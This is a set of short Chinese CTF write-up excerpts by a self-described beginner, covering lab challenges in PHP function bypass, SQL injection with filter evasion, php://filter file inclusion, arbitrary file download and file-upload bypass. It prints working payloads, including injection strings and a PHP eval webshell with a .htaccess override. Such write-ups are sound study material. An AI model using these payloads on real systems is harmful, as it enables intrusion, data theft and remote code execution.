半枫

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，发现一段关于data()函数的warning，页面每隔几秒刷新一次，warning中的时间也会不段改变，推测data()函数一直被调用，查看源码没有获得有用的信息，接下来Burp抓包看看，POST请求传入两个参数，func参数代表函数，p参数代表传入函数的参数值，那能不能执行其他函数呢，传入参数strtolower(AB)，回显ab，说明可以利用传参执行其他函数，直接使用system函数，回显Hacker，看来对传入函数做了限制，试试用file_get_contents函数读取源码， 123456789101112131415161718192021222324252627282930<?php //过滤了很多函数 $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_s...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到有login登录和join注册两个选项，下面一栏是展示用户的，先看看login界面，测试有没有sql注入漏洞，看来没有，再看看join界面，先注册一个用户，然后回到刚刚的页面就好显示我们的用户信息，但是到这里，先点击admin去查看用户界面，结果转不进去，就连重新进靶机的请求也超时（感觉被做局了），后面卡死在这里，看网页源代码和Burp抓包都没有用，然后去看了别的师傅的wp，就是要进用户界面，才能发现一个sql注入点，那我直接不注册用户，直接请求用户界面，因为没注册，所以信息栏就是提示和报错（不过不影响），看到url发现是GET请求传入no参数，推测是数字型注入， 反序列化漏洞爆字段数字段数（列数）为4， 爆数据库发现被过滤，经过测试发现是union select整天被过滤，使用union/**/select进行绕过，字段2的回显会显示在页面上，字段2的回显会显示在页面上，数据库名为fakebook， 爆表名表名为users， 爆列名no相当于id， username,passwd就是我们注册...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，你今天过得不好吗？今天事情不顺心吗？你情绪低落吗？选择一个选项，让可爱的图片让你高兴起来！下面就是两个选项，分别对应狗和猫的图片，看到url，可以发现是GET传入category参数，使用filter伪协议查看index.php文件，发现上面两个参数请求的文件都没有后缀名，我们也先不加后缀名试试， 1?category=php://filter/convert.base64-encode/resource=index base64解码，看到我们需要的信息， 1234567891011121314<?php $file = $_GET['category']; if(isset($file)) { //strpos() 检查：要求 $file 必须包含 "woofers"、"meowers" 或 "index" 之一，否则拒绝执行。 if( strpos( $file, &q...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，发现一个查询入口，提示给了我们两个信息：1.flag表中的列flag存放着flag，直接将flag的位置给我们了；2.只需要提交id即可，说明是一个数值型注入漏洞。看看提交会获得什么，可以查询到两条数据，试试联合查询，发现被过滤了，Burp抓包爆破一下看看过滤了哪些关键字和函数，发现or、-、#、；、and、空格、updatexml、union等很多关键字都被过滤了，说明联合查询、报错注入以及堆叠注入都不能使用了，但是ascii没有被过滤，substr也没被过滤，空格被过滤了，可以使用()来绕过，测试布尔注入， 1(ascii(substr((select(flag)from(flag)),1,1))=102) 1(ascii(substr((select(flag)from(flag)),1,1))=103) 布尔注入可行，运用sql的三目运算if( 表达式1，表达式2，表达式3)如果表达式1是正确的，那么执行表达式2，否则执行表达式3。编写脚本进行爆破， 123456789101112131...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到一个登录页面，尝试看看有没有sql注入，没有sql报错回显，看来不是sql注入漏洞，发现下面还有一个help超链接，发现是Download页面下的GET请求，但是没有发现help.docx文件，换POST请求试试，使用HackBar和Burp抓包都可以，成功下载help.docx文件，推测这个方式可以下载任意文件，尝试下载/WEB-INF/web.xml文件，WEB-INF/ 目录是每个 Web 应用中必须存在的目录，包含一些配置信息，不会被直接暴露给客户端访问。WEB-INF/web.xml：Web 应用的配置文件发现flag的class控制类FlagController,路径在com.wm.ctf.FlagController，构造payload: 1filename=/WEB-INF/classes/com/wm/ctf/FlagController.class 反汇编（IDA反汇编工具）文件，找到一串base64加密的字符串，解码即可获得flag，如果你使用burp抓包发送请求，可以直...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到一个查询入口，回显sql报错，是一个字符型注入点，用万能语句爆一下表， 爆字段数确定字段数（列数）为2， 爆数据库名发现被过滤很多敏感词，尝试堆叠注入， 爆表名先尝试当前处于的数据库下，发现FlagHere， 爆列名11';show colunms from FlagHere;# 爆flag因为rename函数被过滤，无法进行改表操作，但我们可以用handler函数查询， 11';handler FlagHere open;handler FlagHere read next;# 获得flag

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到一个登录界面，首先想到sql注入，回显sql报错，是一个注入点， 爆字段数，发现被过滤，经过测试，发现or，=，()等都被过滤，()被过滤就到账报错注入、时间盲注、布尔盲注都不能使用，只剩下联合查询了，用大写过滤or过滤，字段数（列数）为3，查找回显字段位置，到这里就燃尽了（个人实力有限），试了很多方法，在回显那个页面，找到一个提示字段，先Base32再Base64解密，给了我们一个后端sql查询语句， 1select * from user where username ='$name' 查询只跟name字段有关，但是还是找不到突破口，看了很多wp都是要看看题目最开始给的源码地址， 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRM...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，是文件上传漏洞题，上传测试文件看看文件限制，php,phtml等php文件格式都被过滤，Burp抓包修改Content-Type字段也不行，猜测为文件头检测过滤，上传图片木马试试，文件开头添加GIF89jpg文件头绕过， 12GIF89<script language="php">@eval($_POST['cmd']); </script> 上传成功，接下来需要木马文件（TEST.jpg）被当做php文件解析执行，上传目录配置文件.htaccess，也需要加上GIF89或GIF89ajpg文件头， 1234GIF89<IfModule mime_module>AddType application/x-httpd-php .jpg</IfModule> 上传成功，但是访问文件TEST.jpg并没有被php解析执行，可能.htaccess被过滤了还有另一个目录配置文件.user.ini.user.ini 是 P...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到文件上传入口，推测该题为文件上传漏洞，上传测试文件看看有什么上传文件限制，提示不能带有ph的后缀名，传入图片木马试试， 12GIF89<script language="php">@eval($_POST['cmd']); </script> 这次上传成功了，接下来需要做的是让上传的图片木马以php形式解析，因为含ph的后缀名文件被过滤了，不能通过修改文件后缀名phtml来达到目的，所以我们选择修改配置文件.htaccess将文件解析为php，.htaccess内容: 123<IfModule mime_module>AddType application/x-httpd-php .jpg</IfModule> 使存在该文件的目录下的.jpg文件以php文件来解析，文件被过滤，Burp抓包试试修改Content-Type字段，成功上传，使用蚁剑连接，查找根目录，获得flag

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，直接将源码给我们了，进行代码审计， 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081 <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { //定义三个保护属性：$op,$filename,$content protected $op; protected $filename; protected $content; //魔术方法__construct()：对三个保护属性赋值，调用process()方法 function __construct() { //魔术方法__...